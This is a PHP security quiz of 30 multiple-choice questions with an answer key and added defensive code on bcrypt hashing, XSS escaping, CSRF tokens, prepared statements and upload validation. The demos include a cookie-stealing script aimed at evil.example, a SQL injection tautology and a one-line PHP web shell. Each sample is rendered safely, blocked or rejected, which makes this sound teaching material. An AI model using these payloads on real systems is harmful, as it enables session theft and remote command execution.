MCQs on Security Practices | PHP Intermediate

Ensuring your PHP applications are secure is crucial to protect user data and maintain trust. Learn essential security practices, including password hashing, XSS and CSRF prevention, and SQL injection protection.


PHP Security Practices – 30 Multiple Choice Questions

1. Hashing Passwords (bcrypt, SHA256)

  1. Which of the following is the most secure method for hashing passwords in PHP?
    • A) MD5
    • B) SHA1
    • C) bcrypt
    • D) Base64 encoding
  2. What is the primary purpose of hashing passwords?
    • A) To encrypt passwords
    • B) To store passwords in a reversible format
    • C) To securely store passwords without reversing
    • D) To compress passwords
  3. Which PHP function is used to hash passwords using bcrypt?
    • A) password_hash()
    • B) hash_password()
    • C) bcrypt_hash()
    • D) secure_password()
  4. What is the benefit of using bcrypt for hashing passwords?
    • A) It is very fast to compute
    • B) It is deliberately slow, with a tunable cost factor and a built-in random salt
    • C) It uses one-way encryption
    • D) It allows reversible encryption
  5. Which hashing algorithm is recommended for password storage in modern web applications?
    • A) SHA256
    • B) SHA512
    • C) bcrypt
    • D) MD5
  6. How do you verify if a password matches a hash in PHP?
    • A) password_verify()
    • B) verify_password()
    • C) hash_verify()
    • D) password_check()
  7. What is the purpose of a salt in password hashing?
    • A) To reduce the size of the password
    • B) To make the hash unique even for identical passwords
    • C) To reverse the hash
    • D) To encrypt the password
  8. Why is MD5 considered insecure for hashing passwords?
    • A) It is very slow
    • B) It is very fast to compute, so hashes can be brute-forced or looked up in precomputed tables
    • C) It does not support salting
    • D) It is computationally expensive
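The first eight questions describe the password_hash()/password_verify() workflow. The following added example (not part of the original quiz page) puts it together, including the transparent rehash that password_needs_rehash() enables when the cost factor is raised, and shows why a per-password salt matters. It assumes PHP 7.4 or later on the CLI; the $users array and the usernames and passwords are constructed stand-ins for a database table.

```php
<?php
declare(strict_types=1);

// Added example: bcrypt password storage with PHP's built-in API.
// $users stands in for a database table (constructed sample data).

const BCRYPT_COST = 12; // tune so one hash takes roughly 100-250 ms on your hardware

function registerUser(array &$users, string $username, string $password): void
{
    // password_hash() draws a random 16-byte salt per call and embeds it,
    // together with the cost, in the returned string ("$2y$12$...").
    // Note: bcrypt only looks at the first 72 bytes of the password.
    $users[$username] = password_hash($password, PASSWORD_BCRYPT, ['cost' => BCRYPT_COST]);
}

function loginUser(array &$users, string $username, string $password): bool
{
    // Always verify against *some* hash so response time does not reveal
    // whether the username exists. The dummy hash is generated once.
    static $dummy = null;
    $dummy ??= password_hash('dummy-password', PASSWORD_BCRYPT, ['cost' => BCRYPT_COST]);
    $hash = $users[$username] ?? $dummy;

    // password_verify() parses the salt and cost out of the stored hash
    // and compares the result in constant time.
    if (!password_verify($password, $hash) || !isset($users[$username])) {
        return false;
    }

    // If the stored hash was made with a lower cost or another algorithm,
    // upgrade it now, while the plaintext is available.
    if (password_needs_rehash($hash, PASSWORD_BCRYPT, ['cost' => BCRYPT_COST])) {
        $users[$username] = password_hash($password, PASSWORD_BCRYPT, ['cost' => BCRYPT_COST]);
    }
    return true;
}

$users = [];
registerUser($users, 'alice', 'correct horse battery staple');

// Identical passwords give different bcrypt hashes because each call salts anew.
$h1 = password_hash('same', PASSWORD_BCRYPT, ['cost' => 10]);
$h2 = password_hash('same', PASSWORD_BCRYPT, ['cost' => 10]);
echo "bcrypt hashes of the same password differ: ", var_export($h1 !== $h2, true), PHP_EOL;

// Contrast: an unsalted fast digest gives the same value every time, which is
// exactly what lets precomputed tables and GPU brute force work.
echo "md5 hashes of the same password differ:    ", var_export(md5('same') !== md5('same'), true), PHP_EOL;

echo "alice, correct password: ", var_export(loginUser($users, 'alice', 'correct horse battery staple'), true), PHP_EOL;
echo "alice, wrong password:   ", var_export(loginUser($users, 'alice', 'wrong'), true), PHP_EOL;
echo "unknown user:            ", var_export(loginUser($users, 'nobody', 'anything'), true), PHP_EOL;
```

Run it with `php hashing.php`. Raising BCRYPT_COST later does not require a password reset: the next successful login re-hashes the password at the new cost, so the stored hashes migrate one user at a time.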

2. Cross-Site Scripting (XSS) Prevention

  1. What is Cross-Site Scripting (XSS)?
    • A) A vulnerability that allows attackers to execute scripts in the user’s browser
    • B) A method to prevent SQL injection
    • C) A vulnerability for session hijacking
    • D) A type of file upload vulnerability
  2. Which of the following is the most effective way to prevent XSS attacks?
    • A) Escaping user data with htmlspecialchars() at the point it is output into HTML
    • B) Storing input data in cookies
    • C) Encrypting user input
    • D) Using a Content Security Policy (CSP) on its own
  3. Which of the following PHP functions is commonly used to neutralise HTML in user-supplied text?
    • A) htmlentities()
    • B) htmlspecialchars()
    • C) strip_tags()
    • D) all of the above
  4. Which of the following is the most secure way to include user input in HTML output?
    • A) Directly insert the input without any sanitization
    • B) Use htmlspecialchars() to escape special characters
    • C) Use regular expressions to filter input
    • D) Convert user input to JSON format
  5. What is the purpose of using a Content Security Policy (CSP)?
    • A) To prevent Cross-Site Request Forgery (CSRF) attacks
    • B) To define which sources can execute scripts on the page
    • C) To prevent SQL injection attacks
    • D) To authenticate users
  6. What type of XSS attack allows the attacker to inject a malicious script that is stored on the server?
    • A) Reflected XSS
    • B) Stored XSS
    • C) DOM-based XSS
    • D) Cross-Site Scripting Injection
  7. Which of the following is an example of a stored XSS attack?
    • A) A user submitting a comment that contains a script
    • B) A user clicking a link containing a malicious payload
    • C) An attacker intercepting the user’s session
    • D) A user sending a request with altered HTTP headers
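Questions 9 to 15 cover output escaping, CSP and stored XSS. The added example below (not from the original quiz page) renders a stored comment first unsafely and then with an escaper chosen for each output context, and sends a CSP header as a second layer. It assumes PHP 7.3 or later; the $comments array and the attacker payloads in it are constructed samples, and the header() call only has an effect when the script runs under a web server.

```php
<?php
declare(strict_types=1);

// Added example: context-aware escaping against a stored-XSS comment.
// $comments stands in for rows read back from a database (constructed sample).
$comments = [
    ['author' => 'bob', 'body' => 'Nice post!'],
    [
        // Attribute breakout in the author field, script tag in the body.
        'author' => 'mallory" onmouseover="alert(1)',
        'body'   => '<script>document.location="https://evil.example/?c="+document.cookie</script>',
    ],
];

// VULNERABLE: user data concatenated straight into markup.
function renderUnsafe(array $c): string
{
    return '<div class="comment" data-author="' . $c['author'] . '">' . $c['body'] . '</div>';
}

// Escaper for HTML text and quoted attribute values. ENT_QUOTES covers both
// ' and " (so attribute breakouts fail), ENT_SUBSTITUTE keeps invalid UTF-8
// from turning the whole string into "", and the explicit charset avoids
// mis-decoding.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Escaper for a value embedded in inline JavaScript: JSON-encode it, and also
// hex-escape < > & ' " so "</script>" inside the value cannot end the block.
function eJs(string $s): string
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

// HARDENED: every interpolation goes through the escaper for its context.
function renderSafe(array $c): string
{
    return '<div class="comment" data-author="' . e($c['author']) . '">' . e($c['body']) . '</div>'
         . '<script>var author = ' . eJs($c['author']) . ';</script>';
}

// Defence in depth: only same-origin scripts, no inline script, no plugins.
// An escaping miss then fails to execute instead of stealing the session.
function sendCsp(): void
{
    if (!headers_sent()) {
        header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'");
    }
}

sendCsp();
foreach ($comments as $c) {
    echo "UNSAFE: ", renderUnsafe($c), PHP_EOL;
    echo "SAFE:   ", renderSafe($c), PHP_EOL, PHP_EOL;
}
```

Note that the CSP above would also block the inline `<script>` emitted by renderSafe(); in practice that value would be moved to a data attribute or the script would be given a nonce. The point of the example is that escaping happens on output, per context, not on input: the same comment text may later be emitted into JSON, an e-mail or a log, each with different rules.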

3. Cross-Site Request Forgery (CSRF) Protection

  1. What is Cross-Site Request Forgery (CSRF)?
    • A) A vulnerability that allows attackers to execute unwanted actions on behalf of authenticated users
    • B) A method to bypass user authentication
    • C) A vulnerability in SQL queries
    • D) A security measure against XSS
  2. Which of the following is a common way to prevent CSRF attacks?
    • A) Validating input data with htmlspecialchars()
    • B) Using HTTP-only cookies
    • C) Implementing anti-CSRF tokens in forms
    • D) Using secure password hashing
  3. How does an anti-CSRF token work?
    • A) It prevents SQL injection
    • B) It uniquely identifies legitimate requests to the server
    • C) It encrypts user data
    • D) It hashes the user’s session ID
  4. Which PHP function is used to generate a random anti-CSRF token?
    • A) rand()
    • B) bin2hex()
    • C) random_bytes()
    • D) csrf_token()
  5. Where should the anti-CSRF token be placed in a form to protect against CSRF attacks?
    • A) As a hidden field in the form
    • B) In the URL parameters
    • C) In the cookies
    • D) As a query parameter
  6. What should the server do when it receives a request with an invalid or missing CSRF token?
    • A) Process the request normally
    • B) Redirect the user to the login page
    • C) Reject the request and show an error
    • D) Encrypt the request data
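Questions 16 to 21 describe the token pattern: a random value from random_bytes(), kept in the session and echoed as a hidden field, checked on every state-changing request and rejected with an error when absent or wrong. The following added example (not from the original quiz page) implements that end to end. It runs on the CLI by passing a plain $session array in place of $_SESSION; in a real handler you would call session_start() and pass $_SESSION. The transfer form fields and the forged requests are constructed samples.

```php
<?php
declare(strict_types=1);

// Added example: per-session anti-CSRF token, issued, embedded and verified.
// $session stands in for $_SESSION so the script runs without a web server.

function csrfToken(array &$session): string
{
    // One token per session: 32 bytes from the CSPRNG, hex-encoded for the form.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrfField(array &$session): string
{
    // Hidden field: only forms served by this site carry it, and a page on
    // another origin cannot read the value to copy it into its own form.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '">';
}

function csrfCheck(array &$session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    // hash_equals() compares in constant time; an empty expected token must
    // never match, otherwise a fresh session would accept any request.
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

function handleTransfer(array &$session, array $post): string
{
    if (!csrfCheck($session, $post)) {
        // Reject outright: no redirect to login, no partial processing.
        if (!headers_sent()) {
            http_response_code(403);
        }
        return '403 Forbidden: invalid or missing CSRF token';
    }
    return 'Transferred ' . (int)$post['amount'] . ' to account ' . (int)$post['to'];
}

// --- Demo with a simulated session ---
$session = [];
echo "Form field: ", csrfField($session), PHP_EOL;

// Legitimate submission: the browser posts back the token it was given.
$legit = ['to' => 42, 'amount' => 100, 'csrf_token' => $session['csrf_token']];
echo "legit:   ", handleTransfer($session, $legit), PHP_EOL;

// Forged submission from an attacker page: the victim's cookies ride along,
// but the attacker does not know the token, so the field is missing.
$forged = ['to' => 666, 'amount' => 100000];
echo "forged:  ", handleTransfer($session, $forged), PHP_EOL;

// A guessed token of the right length but wrong value is rejected too.
$guessed = $forged + ['csrf_token' => str_repeat('0', 64)];
echo "guessed: ", handleTransfer($session, $guessed), PHP_EOL;
```

Setting the session cookie with `SameSite=Lax` or `Strict` (session_set_cookie_params() in PHP 7.3+) is a useful complement, but the token check is what stops a forged POST on browsers or paths where SameSite does not apply.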

4. SQL Injection Prevention

  1. What is SQL injection?
    • A) A type of file upload vulnerability
    • B) A technique to execute malicious SQL queries through user input
    • C) A type of authentication bypass attack
    • D) A vulnerability related to password hashing
  2. Which of the following is the most effective way to prevent SQL injection in PHP?
    • A) Using prepared statements with bound parameters
    • B) Using mysql_real_escape_string() for sanitizing input
    • C) Using htmlspecialchars() for sanitizing user input
    • D) Disabling all SQL commands
  3. What is the purpose of using prepared statements in MySQL?
    • A) To escape SQL keywords
    • B) To prevent SQL injection by separating queries from user data
    • C) To improve database performance
    • D) To ensure data is encrypted
  4. What is the risk of using mysql_real_escape_string() for preventing SQL injection?
    • A) It is slow
    • B) It may still allow some SQL injection, e.g. in unquoted numeric contexts
    • C) It makes queries more difficult to read
    • D) It is not compatible with prepared statements
  5. Which of the following is a recommended practice for using SQL queries safely?
    • A) Always use prepared statements and bound parameters
    • B) Use mysql_query() directly with user input
    • C) Escape user data manually with addslashes()
    • D) Accept unescaped input from users
  6. What should you do if you detect an SQL injection vulnerability in your application?
    • A) Ignore it, as it is not a big threat
    • B) Fix the input validation and use prepared statements
    • C) Disable the database access temporarily
    • D) Encrypt all queries
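Questions 22 to 27 contrast escaping with prepared statements. The added example below (not from the original quiz page) runs the same lookups both ways against an in-memory SQLite database through PDO, so it works offline with the pdo_sqlite extension; the users table, the passwords and the attacker payloads are constructed. The mysql_* functions named in the questions were removed in PHP 7, so PDO (or mysqli) with bound parameters is the practical choice anyway.

```php
<?php
declare(strict_types=1);

// Added example: string-built SQL versus prepared statements, run on SQLite.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// With MySQL you would also pass PDO::ATTR_EMULATE_PREPARES => false so the
// server, not the driver, does the parameter binding.

$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)');
$ins = $pdo->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
$ins->execute(['alice', password_hash('alice-pw', PASSWORD_DEFAULT)]);   // constructed rows
$ins->execute(['bob',   password_hash('bob-pw',   PASSWORD_DEFAULT)]);

// VULNERABLE: the username becomes part of the SQL grammar.
function findUserUnsafe(PDO $pdo, string $username): array
{
    $sql = "SELECT id, username FROM users WHERE username = '" . $username . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: the statement is parsed first; the value is bound afterwards and
// can never change the statement's structure.
function findUserSafe(PDO $pdo, string $username): array
{
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE username = ?');
    $stmt->execute([$username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Escaping only: in a numeric context there are no quotes to escape, so the
// payload "1 OR 1=1" passes through addslashes() untouched.
function findByIdEscapedOnly(PDO $pdo, string $id): array
{
    $sql = 'SELECT id, username FROM users WHERE id = ' . addslashes($id);
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: cast and bind as an integer.
function findByIdSafe(PDO $pdo, string $id): array
{
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE id = :id');
    $stmt->bindValue(':id', (int)$id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker input: closes the quoted string and appends a tautology.
$payload = "' OR '1'='1";

echo "unsafe, benign input:    ", json_encode(findUserUnsafe($pdo, 'alice')), PHP_EOL;
echo "unsafe, payload:         ", json_encode(findUserUnsafe($pdo, $payload)), PHP_EOL;
echo "safe, payload:           ", json_encode(findUserSafe($pdo, $payload)), PHP_EOL;
echo "escaped-only, 1 OR 1=1:  ", json_encode(findByIdEscapedOnly($pdo, '1 OR 1=1')), PHP_EOL;
echo "safe, 1 OR 1=1:          ", json_encode(findByIdSafe($pdo, '1 OR 1=1')), PHP_EOL;
```

The string-built query returns every user for the tautology payload, and the addslashes() version returns every user for the numeric payload, while both prepared versions treat the input as a literal value and match at most one row. That is the "separating queries from user data" of question 24 made concrete.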

5. Secure File Uploading

  1. Which of the following is a recommended security practice for file uploads in PHP?
    • A) Accept all file types without restriction
    • B) Rename uploaded files and store them in non-public directories
    • C) Trust the Content-Type header sent by the browser
    • D) Save files with user-supplied names
  2. What function is used to check the MIME type of a file in PHP?
    • A) mime_type()
    • B) get_mime_type()
    • C) finfo_file()
    • D) file_mime_type()
  3. How can you protect against malicious file uploads that could harm the server?
    • A) Use file_get_contents() to inspect file content
    • B) Validate the file extension and MIME type
    • C) Save all uploaded files in the public directory
    • D) Rename all files to random strings
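Questions 28 to 30 list the checks for an image upload: an extension allow-list, the real MIME type from finfo_file(), a random server-side name and a directory outside the web root. The added example below (not from the original quiz page) applies all of them in one validator. To run on the CLI it writes two constructed files (a genuine 1x1 PNG and a PHP web shell renamed to .png) into a temp directory and validates them; storeUpload() shows the move_uploaded_file() step a real POST handler would perform with $_FILES['photo']. The UPLOAD_DIR path is an assumption.

```php
<?php
declare(strict_types=1);

// Added example: validating and storing an image upload.
const UPLOAD_DIR = '/var/app/uploads';   // assumption: outside DocumentRoot, never served directly
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

// Returns the random filename to store under, or throws on any failed check.
function validateUpload(string $tmpPath, string $originalName): string
{
    if (!is_file($tmpPath) || filesize($tmpPath) > MAX_BYTES) {
        throw new RuntimeException('missing or oversized file');
    }
    // 1. Extension from the user-supplied name, lower-cased, must be allow-listed.
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException("extension '$ext' not allowed");
    }
    // 2. MIME type from the file's magic bytes, never from $_FILES['type'],
    //    which the client sends and can set to anything.
    $mime = finfo_file(finfo_open(FILEINFO_MIME_TYPE), $tmpPath);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content is $mime, not " . ALLOWED[$ext]);
    }
    // 3. The image header must parse as well.
    if (getimagesize($tmpPath) === false) {
        throw new RuntimeException('not a decodable image');
    }
    // 4. Never reuse the user's name: a random name defeats path tricks (../,
    //    null bytes) and double extensions such as shell.php.png.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// What a POST handler calls with one entry of $_FILES.
function storeUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . $file['error']);
    }
    $name = validateUpload($file['tmp_name'], $file['name']);
    $dest = UPLOAD_DIR . '/' . $name;
    // move_uploaded_file() refuses any path that is not a genuine PHP upload.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);  // readable by the app user, not executable
    return $name;        // record this in the DB and serve it through a script
}

// --- CLI demo with constructed files ---
$tmp = sys_get_temp_dir() . '/upload-demo-' . bin2hex(random_bytes(4));
mkdir($tmp);
// A genuine 1x1 PNG (constructed sample).
file_put_contents("$tmp/good.png", base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='));
// A PHP web shell renamed to .png (constructed sample; it is never executed).
file_put_contents("$tmp/shell.png", "<?php system(\$_GET['cmd']); ?>");

$cases = [
    ['path' => "$tmp/good.png",  'name' => 'good.png'],   // passes all checks
    ['path' => "$tmp/shell.png", 'name' => 'shell.png'],  // extension ok, content is PHP
    ['path' => "$tmp/good.png",  'name' => 'good.php'],   // content ok, extension not allowed
];
foreach ($cases as $case) {
    try {
        echo $case['name'], ' -> stored as ', validateUpload($case['path'], $case['name']), PHP_EOL;
    } catch (RuntimeException $e) {
        echo $case['name'], ' -> rejected: ', $e->getMessage(), PHP_EOL;
    }
}
array_map('unlink', glob("$tmp/*"));
rmdir($tmp);
```

Even with these checks, keep the upload directory free of execute permissions for the web server (no `php_flag engine` there, or a `.htaccess`/server rule that refuses to run scripts) and serve files back through a script that sets the Content-Type itself, so a polyglot that passes the image checks is still only ever delivered as an image.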

Answer Key

Qno  Answer (option with the text)
1    C) bcrypt
2    C) To securely store passwords without reversing
3    A) password_hash()
4    B) It is deliberately slow, with a tunable cost factor and a built-in random salt
5    C) bcrypt
6    A) password_verify()
7    B) To make the hash unique even for identical passwords
8    B) It is very fast to compute, so hashes can be brute-forced or looked up in precomputed tables
9    A) A vulnerability that allows attackers to execute scripts in the user's browser
10   A) Escaping user data with htmlspecialchars() at the point it is output into HTML
11   D) all of the above
12   B) Use htmlspecialchars() to escape special characters
13   B) To define which sources can execute scripts on the page
14   B) Stored XSS
15   A) A user submitting a comment that contains a script
16   A) A vulnerability that allows attackers to execute unwanted actions on behalf of authenticated users
17   C) Implementing anti-CSRF tokens in forms
18   B) It uniquely identifies legitimate requests to the server
19   C) random_bytes()
20   A) As a hidden field in the form
21   C) Reject the request and show an error
22   B) A technique to execute malicious SQL queries through user input
23   A) Using prepared statements with bound parameters
24   B) To prevent SQL injection by separating queries from user data
25   B) It may still allow some SQL injection, e.g. in unquoted numeric contexts
26   A) Always use prepared statements and bound parameters
27   B) Fix the input validation and use prepared statements
28   B) Rename uploaded files and store them in non-public directories
29   C) finfo_file()
30   B) Validate the file extension and MIME type

Use a blank sheet to note your answers, then tally them against the answer key above and give yourself a score.
